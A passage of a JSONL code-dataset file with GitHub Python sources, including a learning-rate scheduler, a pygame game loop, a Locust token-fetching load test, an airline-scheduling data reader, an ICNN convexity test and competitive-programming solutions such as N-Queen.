self.get_warmup_ratio()\n else:\n ratio = self.get_main_ratio()\n return ratio\n\n def get_main_ratio(self):\n raise NotImplementedError\n\n def get_warmup_ratio(self):\n assert self.warmup in ('linear', 'exp')\n alpha = self.last_epoch / self.warmup_iter\n if self.warmup == 'linear':\n ratio = self.warmup_ratio + (1 - self.warmup_ratio) * alpha\n elif self.warmup == 'exp':\n ratio = self.warmup_ratio ** (1. - alpha)\n return ratio\n\nclass WarmupPolyLrScheduler(WarmupLrScheduler):\n\n def __init__(\n self,\n optimizer,\n power,\n max_iter,\n warmup_iter=500,\n warmup_ratio=5e-4,\n warmup='exp',\n last_epoch=-1,\n ):\n self.power = power\n self.max_iter = max_iter\n super(WarmupPolyLrScheduler, self).__init__(\n optimizer, warmup_iter, warmup_ratio, warmup, last_epoch)\n\n def get_main_ratio(self):\n real_iter = self.last_epoch - self.warmup_iter\n real_max_iter = self.max_iter - self.warmup_iter\n alpha = real_iter / real_max_iter\n ratio = (1 - alpha) ** self.power\n return ratio\n\n\n\nif __name__ == '__main__':\n optim = WarmupPolyLR()\n","repo_name":"favoMJ/FEENet","sub_path":"utils/scheduler/lr_scheduler.py","file_name":"lr_scheduler.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11653617833","text":"#! 
/usr/bin/env python\n\nfrom pygame.locals import KEYDOWN, K_ESCAPE, K_x, QUIT\n\nimport pygame\n\n\"\"\"\nIf using an older Raspberry Pi distro, you might need to run the following commands to get working sound:\n\nsudo apt-get install alsa-utils\nsudo modprobe snd_bcm2835\n\"\"\"\n\n# initialise pygame before we import anything else\npygame.mixer.pre_init(44100, -16, 2, 1024)\npygame.init()\n\nimport rpg.states\n\ndef playMain():\n # get the first state\n currentState = rpg.states.showTitle(True)\n # start the main loop\n clock = pygame.time.Clock() \n while True:\n clock.tick(rpg.states.FRAMES_PER_SEC)\n for event in pygame.event.get():\n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n return\n if event.type == KEYDOWN and event.key == K_x:\n # toggle sound\n rpg.states.soundHandler.toggleSound()\n rpg.states.musicPlayer.toggleMusic()\n # detect key presses \n keyPresses = pygame.key.get_pressed()\n # delegate key presses to the current state\n newState = currentState.execute(keyPresses)\n # flush sounds\n rpg.states.soundHandler.flush()\n # change state if necessary\n if newState:\n currentState = newState\n\n# this calls the playMain function when this script is executed\nif __name__ == '__main__': playMain()\n","repo_name":"samroyale/ulmo-game","sub_path":"src/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"70517413431","text":"from locust import HttpUser, TaskSet, task, between, SequentialTaskSet, User\nimport json\nfrom os import environ\n\ndef get_environment():\n if environ.get(\"TEST_CLIENT_ID\"):\n client_id = environ.get(\"TEST_CLIENT_ID\")\n client_secret = environ.get(\"TEST_CLIENT_SECRET\")\n return client_id, client_secret\n\ndef get_host():\n if environ.get(\"TEST_API_URL\"):\n host = environ.get(\"TEST_API_URL\")\n return host\n\n\nclass GetToken(TaskSet):\n\n @task\n def get_token(self):\n get_env = get_environment()\n client_id = get_env[0]\n client_secret = get_env[1]\n\n response = self.client.post(\"/auth/token\", json={\n \"client_id\": client_id,\n \"client_secret\": client_secret\n }\n )\n\n if (response.status_code == 200):\n body = response.json()\n token = body['access_token']\n self.jwt = f'Bearer {token}'\n print(self.jwt)\n return self.jwt\n else:\n print(f'Status Code: {response.status_code}')\n self.interrupt()\n\n\nclass WebsiteUser(HttpUser):\n host = get_host()\n\n tasks = [GetToken]\n wait_time = between(1, 1)\n","repo_name":"stixaw/Locustio-project","sub_path":"workschedule/Get_Token.py","file_name":"Get_Token.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10335918698","text":"import numpy as np\nimport sys\nfrom utilities import *\n\nfeat_path = sys.argv[1]\nimage_path = sys.argv[2]\n\nvgg_model = 'data/VGG_ILSVRC_19_layers.caffemodel'\nvgg_deploy = 'data/VGG_ILSVRC_19_layers_deploy.prototxt'\n\ncnn = CNN(model=vgg_model, deploy=vgg_deploy, width=224, height=224)\n\nfeats = cnn.get_features([image_path], layers='conv5_3', layer_sizes=[512,14,14])\nnp.save(feat_path, feats)\n\n","repo_name":"rahul411/Image-captioning-using-Attention","sub_path":"CreateDataForSingleImage.py","file_name":"CreateDataForSingleImage.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} 
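The CreateDataForSingleImage.py record above extracts VGG conv5_3 activations and saves them with np.save, but stops short of showing how they are consumed. Below is a minimal sketch, assuming the (1, 512, 14, 14) array layout implied by layer_sizes=[512,14,14], of reshaping the saved file into the per-region annotation vectors that soft-attention caption decoders typically attend over; the file name and every variable here are illustrative, not taken from that repository.

import numpy as np

feats = np.load("single_image_feats.npy")  # assumed shape: (1, 512, 14, 14)
n, c, h, w = feats.shape
# Flatten the 14x14 spatial grid into 196 regions, one 512-d vector each
annotations = feats.reshape(n, c, h * w).transpose(0, 2, 1)  # (1, 196, 512)
print(annotations.shape)  # each of the 196 rows can now be weighted by an attention head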
+{"seq_id":"43949149816","text":"import numpy as np\nimport pandas as pd\nimport datetime\n\nclass DataReader():\n\n def __init__(self, filename='', env_d=0):\n self.filename = filename\n self.env_d = env_d\n\n print(datetime.datetime.now(), 'Start - Load Data')\n self.df_excel = pd.read_excel(self.filename, sheetname=[0, 1, 2, 3, 4])\n\n self.df = self.df_excel[0].fillna(value=1.0)\n self.df = self.df.sort_values(by='航班ID', ascending=True)\n\n ################################################################################################################\n # 基准日期\n self.base_date = self.df['日期'].min()\n # 故障表/台风场景\n self.df_fault = self.df_excel[3]\n self.df_fault = self.df_fault.fillna(value=-1)\n\n ds_s = pd.to_datetime(self.df_fault['开始时间'])\n ds_e = pd.to_datetime(self.df_fault['结束时间'])\n\n ds_s_days = (ds_s - self.base_date).dt.days\n ds_s_seconds = (ds_s - self.base_date).dt.seconds\n ds_s_minutes = (ds_s_days * 24 * 60) + (ds_s_seconds / 60)\n\n ds_e_days = (ds_e - self.base_date).dt.days\n ds_e_seconds = (ds_e - self.base_date).dt.seconds\n ds_e_minutes = (ds_e_days * 24 * 60) + (ds_e_seconds / 60)\n\n self.df_fault['开始时间'] = ds_s_minutes\n self.df_fault['结束时间'] = ds_e_minutes\n # 增加一个 已停机数 字段\n self.df_fault['已停机数'] = 0.0\n\n # 航班飞机限制表\n self.df_limit = self.df_excel[1]\n\n # 机场关闭限制表\n self.df_close = self.df_excel[2]\n ds = pd.to_datetime(self.df_close['生效日期'])\n ds = (ds - self.base_date).dt.days\n self.df_close['生效日期'] = ds * 24 * 60\n ds = pd.to_datetime(self.df_close['失效日期'])\n ds = (ds - self.base_date).dt.days\n self.df_close['失效日期'] = ds * 24 * 60\n\n ds = pd.to_datetime(self.df_close['关闭时间'], format='%H:%M:%S')\n self.df_close['关闭时间'] = ds.dt.hour * 60 + ds.dt.minute\n ds = pd.to_datetime(self.df_close['开放时间'], format='%H:%M:%S')\n self.df_close['开放时间'] = ds.dt.hour * 60 + ds.dt.minute\n\n # 飞行时间表\n self.df_flytime = self.df_excel[4]\n\n print(datetime.datetime.now(), 'End - Load Data')\n # 生成默认环境\n #\n # 0~12 基本信息\n # 0航班ID,1日期(相对于基准日期的分钟),2国内/国际,3航班号,4起飞机场,5到达机场,\n # 6起飞时间(相对于基准时间的分钟数),7起飞时间(相对于0点的分钟数),8到达时间(相对于基准时间的分钟数),9到达时间(相对于0点的分钟数)\n # 10飞机ID,11机型,12重要系数(*100 取整数)\n #\n # 13~30 故障信息\n # 13、14、15起飞机场故障(状态、开始时间、结束时间),16、17、18降落机场故障(状态、开始时间、结束时间),\n # 19、20、21航班故障(状态、开始时间、结束时间),\n # 22、23、24飞机故障(状态、开始时间、结束时间),\n # 25、26、27、28起飞机场停机限制(状态、停机数、开始时间、结束时间),29、30、31、32降落机场停机限制(状态、停机数、开始时间、结束时间)\n #\n # 33~42 机场关闭信息\n # 33起飞机场关闭(相对于0点的分钟数),34起飞机场开放(相对于0点的分钟数),35起飞机场关闭起效日期,36起飞机场关闭失效日期,37是否起飞机场关闭\n # 38降落机场关闭(相对于0点的分钟数),39降落机场开放(相对于0点的分钟数),40降落机场关闭起效日期,41��落机场关闭失效日期,42是否降落机场关闭\n #\n # 43~50 先导、后继、过站时间、联程、中转等信息\n # 43先导航班ID,44后继航班ID,45过站时间(分钟数)、46是否联程航班,47联程航班ID\n # 48是否有中转、49中转类型(国内-国内:0、国内-国际:1、国际-国内:2、国际-国际:3)、50中转时间限制、51对应的出港航班\n #\n # 52~57 调整方法信息\n # 52是否取消(0-不取消,1-取消),53改变航班绑定的飞机(0-不改变,1-改为同型号其他飞机,2-改为不同型号飞机),\n # 54修改航班起飞时间(0-不修改,1-延误、2-提前),55联程拉直(0-不拉直,1-拉直,注:第一段设置为拉直后第二段状态为取消,或者用其他方式处理),\n # 56调机(0-不调,1-调),57时间调整量(分钟数)\n #\n # 58~ 硬约束状态\n # 58航站衔接,59航线-飞机限制,60机场关闭,61飞机过站时间,62台风场景,63边界禁止调整-最早,64边界禁止调整-最晚\n # 65是否是边际航班-最早,66是否是边际航班-最晚\n #\n # 67~ 航线-飞机限制\n # 67是否航线-飞机限制\n # 动态添加,长度为 self.df_limit.groupby(['起飞机场', '降落机场']).count().max()\n #\n\n limit_len = self.df_limit.groupby(['起飞机场', '降落机场']).count().max()[0]\n self.arr_env = np.zeros([len(self.df), self.env_d + limit_len], dtype=np.int32)\n\n print(datetime.datetime.now(), 'Start - BASIC Data')\n ################################################################################################################\n # 0~12 基本信息\n # 0航班ID,1日期(相对于基准日期的分钟),2国内/国际,3航班号,4起飞机场,5到达机场,\n # 
6起飞时间(相对于基准时间的分钟数),7起飞时间(相对于0点的分钟数),8到达时间(相对于基准时间的分钟数),9到达时间(相对于0点的分钟数)\n # 10飞机ID,11机型,12重要系数(*100 取整数)\n #\n # 13~30 故障信息\n # 13、14、15起飞机场故障(状态、开始时间、结束时间),16、17、18降落机场故障(状态、开始时间、结束时间),\n # 19、20、21航班故障(状态、开始时间、结束时间),\n # 22、23、24飞机故障(状态、开始时间、结束时间),\n # 25、26、27、28起飞机场停机限制(状态、停机数、开始时间、结束时间),29、30、31、32降落机场停机限制(状态、停机数、开始时间、结束时间)\n #\n # 33~42 机场关闭信息\n # 33起飞机场关闭(相对于0点的分钟数),34起飞机场开放(相对于0点的分钟数),35起飞机场关闭起效日期,36起飞机场关闭失效日期,37是否起飞机场关闭\n # 38降落机场关闭(相对于0点的分钟数),39降落机场开放(相对于0点的分钟数),40降落机场关闭起效日期,41降落机场关闭失效日期,42是否降落机场关闭\n #\n # 43~50 先导、后继、过站时间、联程、中转等信息\n # 43先导航班ID,44后继航班ID,45过站时间(分钟数)、46是否联程航班,47联程航班ID\n # 48是否有中转、49中转类型(国内-国内:0、国内-国际:1、国际-国内:2、国际-国际:3)、50中转时间限制、51对应的出港航班\n #\n # 52~57 调整方法信息\n # 52是否取消(0-不取消,1-取消),53改变航班绑定的飞机(0-不改变,1-改为同型号其他飞机,2-改为不同型号飞机),\n # 54修改航班起飞时间(0-不修改,1-延误、2-提前),55联程拉直(0-不拉直,1-拉直,注:第一段设置为拉直后第二段状态为取消,或者用其他方式处理),\n # 56调机(0-不调,1-调),57时间调整量(分钟数)\n #\n # 58~ 硬约束状态\n # 58航站衔接,59航线-飞机限制,60机场关闭,61飞机过站时间,62台风场景,63边界禁止调整-最早,64边界禁止调整-最晚\n # 65是否是边际航班-最早,66是否是边际航班-最晚\n #\n # 67~ 航线-飞机限制\n # 67是否航线-飞机限制\n # 动态添加,长度为 self.df_limit.groupby(['起飞机场', '降落机场']).count().max()\n #\n\n limit_len = self.df_limit.groupby(['起飞机场', '降落机场']).count().max()[0]\n self.arr_env = np.zeros([len(self.df), self.env_d + limit_len], dtype=np.int32)\n\n print(datetime.datetime.now(), 'Start - BASIC Data')\n ################################################################################################################\n # 0~12 基本信息\n # 0航班ID,1日期(相对于基准日期的分钟),2国内/国际,3航班号,4起飞机场,5到达机场,\n # 6起飞时间(相对于基准时间的分钟数),7起飞时间(相对于0点的分钟数),8到达时间(相对于基准时间的分钟数),9到达时间(相对于0点的分钟数)\n # 10飞机ID,11机型,12重要系数(*100 取整数)\n # 航班ID\n self.arr_env[:, 0] = self.df['航班ID']\n # 日期\n ds = pd.to_datetime(self.df['日期'])\n ds = (ds - self.base_date).dt.days\n days_minutes = ds * 24 * 60\n self.arr_env[:, 1] = days_minutes\n self.df['日期'] = days_minutes\n # 国际=0/国内=1\n self.arr_env[:, 2] = self.df['国际/国内'].replace(['国际', '国内'], [0, 1])\n # 航班号\n self.arr_env[:, 3] = self.df['航班号']\n # 起飞/降落机场\n self.arr_env[:, 4] = self.df['起飞机场']\n self.arr_env[:, 5] = self.df['降落机场']\n # 起飞时间\n ds = pd.to_datetime(self.df['起飞时间'])\n ds_days = (ds - self.base_date).dt.days\n ds_seconds = (ds - self.base_date).dt.seconds\n ds_minutes_s = (ds_days * 24 * 60) + (ds_seconds / 60)\n self.arr_env[:, 6] = ds_minutes_s\n self.df['起飞时间'] = ds_minutes_s\n self.arr_env[:, 7] = ds.dt.hour * 60 + ds.dt.minute\n # 到达时间\n ds = pd.to_datetime(self.df['降落时间'])\n ds_days = (ds - self.base_date).dt.days\n ds_seconds = (ds - self.base_date).dt.seconds\n ds_minutes_e = (ds_days * 24 * 60) + (ds_seconds / 60)\n self.arr_env[:, 8] = ds_minutes_e\n self.df['降落时间'] = ds_minutes_e\n self.arr_env[:, 9] = ds.dt.hour * 60 + ds.dt.minute\n # 飞机ID\n self.arr_env[:, 10] = self.df['飞机ID']\n # 机型\n self.arr_env[:, 11] = self.df['机型']\n # 重要系数\n self.arr_env[:, 12] = self.df['重要系数'] * 100\n\n ################################################################################################################\n # 飞机ID-机型表\n # 飞机ID,机型\n self.df_plane_type = self.df[['飞机ID', '机型']].drop_duplicates()\n # 飞机ID表\n self.all_plane = np.array(self.df_plane_type['飞机ID'].drop_duplicates().sort_values())\n\n ################################################################################################################\n # 边界表\n # 飞机ID,最早起飞航班号,最早起飞机场,最晚起飞航班号,最晚起飞机场\n first_ = pd.DataFrame(self.df.groupby(['飞机ID'])['起飞时间', '飞机ID'].min())\n first_.columns = ['最早起飞时间', '飞机ID']\n last_ = pd.DataFrame(self.df.groupby(['飞机ID'])['起飞时间', '飞机ID'].max())\n last_.columns = ['最晚起飞时间', '飞机ID']\n\n self.df_first = pd.merge(first_, self.df, how='left'\n , left_on=['最早起飞时间', '飞机ID']\n , right_on=['起飞时间', '飞机ID'])[['飞机ID', '航班ID','最早起飞时间', '起飞机场', '降落机场']]\n\n self.df_last = pd.merge(last_, self.df, how='left'\n , left_on=['最晚起飞时间', '飞机ID']\n , right_on=['起飞时间', '飞机ID'])[['飞机ID', '航班ID', '最晚起飞时间', '起飞机场', '降落机场']]\n\n ################################################################################################################\n # 国内航班机场\n domestic_airport_d = self.df[(self.df['国际/国内'] == '国内')]['起飞机场']\n domestic_airport_a = self.df[(self.df['国际/国内'] == '国内')]['降落机场']\n self.domestic_airport = np.array(pd.concat([domestic_airport_d, domestic_airport_a]).drop_duplicates())\n # 所有机场列表\n airport_d = self.df['起飞机场']\n airport_a = self.df['降落机场']\n self.all_airports = np.array(pd.concat([airport_d, airport_a]).drop_duplicates())\n\n ################################################################################################################\n # 获取可能的最早和最晚起飞时间\n self.time_d_min = min(self.arr_env[:, 6]) - (6 * 60) # 减去最大可提前小时数6小时\n self.time_d_max = max(self.arr_env[:, 6]) + (24 * 60) # 加上最大可延误数24小时(国际航班不允许调机,国内航班最多延误24小时)\n\n print(datetime.datetime.now(), 'End - BASIC Data')\n\n # 附加状态的处理\n # 故障、航线-飞机限制、机场关闭限制\n def app_action(self):\n # 故障计数,即默认环境中需要被调整处理掉的数据\n fault_count_ = 0\n print(datetime.datetime.now(), 'Start - Att Data')\n for row in self.arr_env:\n line_id = row[0] # 航班ID\n airport_d = row[4] # 起飞机场\n airport_a = row[5] # 到达机场\n time_d = row[6] # 起飞时间\n time_a = row[8] # 到达时间\n 
time_d_0 = row[7] # 起飞时间,0点为基准\n time_a_0 = row[9] # 到达时间,0点为基准\n plane_id = row[10] # 飞机ID\n\n # 后继航班ID\n next_id = 0\n # 后继航班起飞时间\n next_time_d = 0\n\n ############################################################################################################\n # 43~50 先导、后继、过站时间、联程、中转等信息\n #\n # 43先导航班ID,44后继航班ID,45过站时间(分钟数)\n # 后继航班:飞机ID相同 起飞时间大于本航班降落时间 按起飞时间排序之后第一个航班\n r_ = self.df[(self.df['飞机ID'] == plane_id) & (self.df['起飞时间'] > time_d)].sort_values(by='起飞时间', ascending=True)\n if len(r_) > 0:\n # 本航班的后继航班\n next_id = r_.iloc[0][0]\n # 后继航班起飞时间\n next_time_d = r_.iloc[0][6]\n row[44] = next_id\n # 本航班的到达时间\n time_a_ = row[8]\n # 后继航班的先导航班即是本航班\n row_next = self.arr_env[next_id - 1]\n row_next[43] = row[0]\n # 后继航班的起飞时间\n time_d_ = row_next[6]\n # 过站时间\n row[45] = time_d_ - time_a_\n\n # 联程航班: 日期与航班号相同\n # 46是否联程航班,47联程航班ID\n if (row[1] == row_next[1]) & (row[3] == row_next[3]) :\n row[46] = 1\n # 联程航班第一段的ID就是后继航班ID\n row[47] = next_id\n # 联程航班第二段\n row_next[46] = 1\n row_next[47] = row[0]\n\n ############################################################################################################\n # 故障航班/台风场景\n # 13~30 故障信息\n #\n # 13、14、15起飞机场故障(状态、开始时间、结束时间):起飞时间在范围内 & 故障类型=飞行 & 起飞机场相同\n r_ = self.df_fault[(self.df_fault['影响类型'] == '起飞') & (airport_d == self.df_fault['机场'])]\n if len(r_) > 0 :\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[14] = t_s\n row[15] = t_e\n if (time_d > t_s) & (time_d < t_e):\n row[13] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n\n # 16、17、18降落机场故障(状态、开始时间、结束时间):降落时间在范围内 & (故障类型=飞行|降落) & 降落机场相同\n r_ = self.df_fault[(self.df_fault['影响类型'] == '降落') & (airport_a == self.df_fault['机场'])]\n if len(r_) > 0 :\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[17] = t_s\n row[18] = t_e\n if (time_a > t_s) & (time_a < t_e):\n row[16] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n\n # 19、20、21航班故障(状态、开始时间、结束时间):起飞时间在范围内 & 故障类型=飞行 & 航班ID相同\n # 22、23、24飞机故障(状态、开始时间、结束时间):起飞时间在范围内 & 故障类型=飞行 & 飞机ID相同\n # 25、26、27、28起飞机场停机限制(状态、停机限制数量、开始时间、结束时间):起飞机场停机不做控制,停机故障都放在降落机场上处理\n\n # 29、30、31、32降落机场停机限制(状态、停机限制数量、开始时间、结束时间):\n # 时间在范围内(本航班的降落时间<结束时间 & 后继班的起飞时间>开始时间) & 故障类型=停机 & 降落机场相同\n # 有后继航班\n if next_id > 0:\n r_ = self.df_fault[(self.df_fault['影响类型'] == '停机') & (airport_a == self.df_fault['机场'])]\n\n if len(r_) > 0:\n self.df_fault.loc[r_.index, ['已停机数']] += 1\n\n p_num = 0\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[30] = p_num\n row[31] = t_s\n row[32] = t_e\n if (time_a < t_e) & (next_time_d > t_s):\n row[29] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n # 无后继航班的状态\n else:\n r_ = self.df_fault[(self.df_fault['影响类型'] == '停机') & (airport_a == self.df_fault['机场'])]\n\n if len(r_) > 0:\n self.df_fault.loc[r_.index, ['已停机数']] += 1\n\n p_num = 0\n t_s = r_['开始时间'].min()\n t_e = r_['结束时间'].max()\n row[30] = p_num\n row[31] = t_s\n row[32] = t_e\n if (time_a < t_e) & (time_a > t_s):\n row[29] = 1\n fault_count_ += 1\n # 台风场景故障状态\n row[62] = 1\n\n ############################################################################################################\n # 33~42 机场关闭信息\n # 33起飞机场关闭(相对于0点的分钟数),34起飞机场开放(相对于0点的分钟数),35起飞机场关闭起效日期,36起飞机场关闭失效日期,37是否起飞机场关闭\n # 起飞机场ID一致 & 起飞时间在机场关闭的生效与失效日期之内\n rows = np.array(self.df_close[(self.df_close['机场'] == airport_d)])\n for row_ in rows:\n # 关闭和开放时间之间跨越24点的处理\n if row_[2] < row_[1]:\n row_[2] += 24 * 60\n\n row[33] = row_[1]\n row[34] = row_[2]\n row[35] = row_[3]\n row[36] = row_[4]\n if (time_d >= row_[3]) & (time_d <= row_[4]) & (time_d_0 > row_[1]) & (time_d_0 < row_[2]):\n row[37] = 
1\n\n # 38降落机场关闭(相对于0点的分钟数),39降落机场开放(相对于0点的分钟数),40降落机场关闭起效日期,41降落机场关闭失效日期,42是否降落机场关闭\n # 降落机场ID一致 & 降落时间在机场关闭的生效与失效日期之内\n rows = np.array(self.df_close[(self.df_close['机场'] == airport_a)])\n for row_ in rows:\n # 关闭和开放时间之间跨越24点的处理\n if row_[2] < row_[1]:\n row_[2] += 24 * 60\n\n row[38] = row_[1]\n row[39] = row_[2]\n row[40] = row_[3]\n row[41] = row_[4]\n if (time_a >= row_[3]) & (time_a <= row_[4]) & (time_a_0 > row_[1]) & (time_a_0 < row_[2]):\n row[42] = 1\n\n ############################################################################################################\n # 中转航班信息: 添加在有中转的进港航班上\n # 48是否有中转(0非中转、1中转)\n # 49中转类型(国内-国内:0、国内-国际:1、国际-国内:2、国际-国际:3)\n # 50中转时间限制\n # 51对应的出港航班\n\n ############################################################################################################\n # 65是否是边际航班-最早,66是否是边际航班-最晚\n r_f_ = self.df_first[self.df_first['航班ID'] == line_id]\n r_l_ = self.df_last[self.df_last['航班ID'] == line_id]\n if len(r_f_) > 0:\n row[65] = 1\n if len(r_l_) > 0:\n row[66] = 1\n\n ############################################################################################################\n # 67~ 航线-飞机限制\n # 67是否航线-飞机限制(0不限制,1限制)\n # 动态添加,长度为 self.df_limit.groupby(['起飞机场', '降落机场']).count().max()\n arr_limit = np.array(self.df_limit[((self.df_limit['起飞机场'] == airport_d)\n & (self.df_limit['降落机场'] == airport_a))]['飞机ID'])\n\n if len(arr_limit) > 0:\n row[68: 68 + len(arr_limit)] = arr_limit\n if plane_id in arr_limit:\n row[67] = 1\n\n ################################################################################################################\n # 获取特殊过站时间表(即初始环境下过站时间就小于50分钟的航班)\n df_special_passtime = pd.DataFrame(self.arr_env)\n df_special_passtime = df_special_passtime[(df_special_passtime[45] < 50)\n & (df_special_passtime[44] != 0)][[0, 44, 45]]\n df_special_passtime.columns = ['航班ID', '后继航班ID', '过站时间']\n\n print(datetime.datetime.now(), 'End - Att Data')\n return fault_count_, df_special_passtime\n\n def read(self, is_save = False, filename = ''):\n fault_count_, df_special_passtime = self.app_action()\n\n if is_save:\n np.save(filename, [self.arr_env , fault_count_, df_special_passtime])\n\n return self.arr_env, fault_count_, df_special_passtime\n\n\n def read_fromfile(self, filename):\n data_ = np.load(filename)\n self.arr_env = data_[0]\n fault_count_ = data_[1]\n df_special_passtime = data_[2]\n\n return self.arr_env, fault_count_, df_special_passtime\n\n# reader = DataReader(filename='DATA_20170705.xlsx' , env_d=59)\n# print(reader.read())\n","repo_name":"xyskywalker/DQN","sub_path":"AirLine_Phase_I/DataReader.py","file_name":"DataReader.py","file_ext":"py","file_size_in_byte":21016,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"17691836630","text":"'''\nCoroutines\n• Coroutines are functions whose processing can be suspended and\nresumed at specific points. So, typically, a coroutine will execute up to\na certain statement, then suspend execution while waiting for some\ndata. 
At this point other parts of the program can continue to execute\n(usually other coroutines that aren’t suspended).\n'''\n\n#import coroutines\n#from coroutines import finditer, send\n#import types \nfrom types import coroutine\n#Coroutines\n@coroutine\ndef regex_matcher(receiver, regex):\n\twhile True:\n\t\ttext = (yield)\n\t\tfor match in regex.finditer(text):\n\t\t\treceiver.send(match)\n\n\n\n\n","repo_name":"azatsatklichov/z-Py","sub_path":"py3-kurz2/g-practices/coroutines.py","file_name":"coroutines.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"26276487342","text":"import torch\nfrom src.mapficnn import MapFICNN\nfrom src.pcpmap import PCPMap\n\n\nclass ConvTest:\n \"\"\"\n Checks function convexity by minimizing the minimum of\n hessian / minimum of eigenvalues of hessian. If the value\n is positive then we claim convexity\n \"\"\"\n def __init__(self, icnn):\n \"\"\"\n :param icnn: neural network\n \"\"\"\n self.icnn = icnn\n\n def conv_test_ficnn(self, x):\n \"\"\"\n Convexity test for FICNN network\n :param x: the first i-1 / first block component of target sample x\n :return: minimum of hessian / eigenvalues of hessian\n \"\"\"\n mapficnn = MapFICNN(None, self.icnn)\n\n def closure():\n optimizer.zero_grad()\n hessian = mapficnn.gyinv_grad(x)\n if x.shape[1] > 1:\n loss = torch.min(torch.linalg.eigvalsh(hessian))\n else:\n loss = torch.min(hessian)\n loss.backward()\n return loss\n\n optimizer = torch.optim.LBFGS(mapficnn.parameters(), line_search_fn=\"strong_wolfe\",\n max_iter=1000000)\n optimizer.step(closure)\n eig_min = closure()\n return eig_min\n\n def conv_test_picnn(self, x, y):\n \"\"\"\n Convexity test for PICNN network\n :param x: non-input-convex component\n :param y: input-convex component\n :return: minimum of hessian / eigenvalues of hessian\n \"\"\"\n mappicnn = PCPMap(None, self.icnn)\n\n def closure():\n optimizer.zero_grad()\n hessian = mappicnn.gxinv_grad(y, x)\n if y.shape[1] > 1:\n loss = torch.min(torch.linalg.eigvalsh(hessian))\n else:\n loss = torch.min(hessian)\n loss.backward()\n return loss\n\n optimizer = torch.optim.LBFGS(mappicnn.parameters(), line_search_fn=\"strong_wolfe\",\n max_iter=1000000)\n optimizer.step(closure)\n eig_min = closure()\n return eig_min\n\n\nif __name__ == \"__main__\":\n\n from src.icnn import PICNN\n x = torch.randn(100, 2).requires_grad_(True)\n y = torch.randn(100, 3).requires_grad_(True)\n picnn = PICNN(3, 2, 128, 128, 1, 6)\n ConvTest1 = ConvTest(icnn=picnn)\n eig = ConvTest1.conv_test_picnn(x, y)\n print(\"Minimum Eigenvalue:\", eig)\n","repo_name":"EmoryMLIP/PCP-Map","sub_path":"test/conv_test.py","file_name":"conv_test.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29846281432","text":"import sys\nsys.stdin = open('BOJ_1703.txt', 'r')\n\nwhile True:\n data = list(map(int, input().split()))\n a = data[0]\n if a == 0:\n break\n\n result = 1\n for i in range(1, 2*a, 2):\n splittingFactor = data[i]\n branching = data[i+1]\n\n result *= splittingFactor\n result -= branching\n\n print(result)","repo_name":"Sanghyeok-Jeon/Algorithm","sub_path":"Python/BAEKJOON/BOJ_1703_생장점.py","file_name":"BOJ_1703_생장점.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74323670070","text":"# N x N 크기인 체스판 위에 N개의 퀸을 놓는다.\n# 
한 자리에 위치한 퀸에 대해 같은 x축 선상, y축 선상, 그리고 대각선 방향에 대해 퀸이 존재할 수는 없다.\n\n# 백트래킹을 사용해야 한다.\n# 우선 모든 좌표에 대해 검사를 진행해야 한다.\n# 한 좌표에다 놓고 다음 퀸을 놓는 과정에서 조건이 맞지 않으면 돌아가야 한다.\n\n# 시간 제한이 10초다! 여태까지 만나본 문제중에 가장 시간이 널널한 문제인데, 막상 풀다보면 여유롭지 그럴거같다...\n# 재귀를 이용할 것이기에 재귀의 깊이 초과, 시간 초과등을 조심해야 한다.\n\ndef check(x):\n for j in range(0, x):\n if arr[x] == arr[j]:\n return False\n elif abs(x - j) == abs(arr[x] - arr[j]):\n return False\n return True\n\ndef Queen(n, k):\n global cnt\n\n if n == k:\n cnt += 1\n return\n\n for i in range(0, N):\n arr[n] = i\n if check(n):\n Queen(n + 1, k)\n\n\nN = int(input())\narr = [0] * N # 체스판\ncnt = 0\n\nQueen(0, N)\nprint(cnt)","repo_name":"applevalley/Problem-Solving","sub_path":"BOJ/9663. N-Queen/boj_9663.py","file_name":"boj_9663.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"27792918486","text":"import logging\nclass NullHandler(logging.Handler):\n def emit(self, record):\n pass\nlog = logging.getLogger('ListeningEngine')\nlog.setLevel(logging.ERROR)\nlog.addHandler(NullHandler())\n\nimport threading\n\nimport EngineStats\nfrom EngineException import TearDownException, \\\n OutputUnavailableException\n\nclass ListeningEngine(threading.Thread):\n \n def __init__(self,listener,output_cb):\n \n # store params\n self.listener = listener\n self.output_cb = output_cb\n \n # log\n log.debug(\"creating instance\")\n \n # initialize parent class\n threading.Thread.__init__(self)\n \n # give this thread a name\n self.name = 'ListeningEngine'\n \n # local variables\n self.stats = EngineStats.EngineStats(['numIn',\n 'numOutOk',\n 'numOutFail'])\n \n #======================== public ==========================================\n \n def run(self):\n \n while True:\n \n # block until receiving some data\n try:\n (timestamp,source,data) = self.listener.getData()\n except TearDownException:\n # log\n self.warning(\"TearDown\")\n \n # stop this thread\n break\n \n # log\n log.debug(\"Got data {2} at {0} from 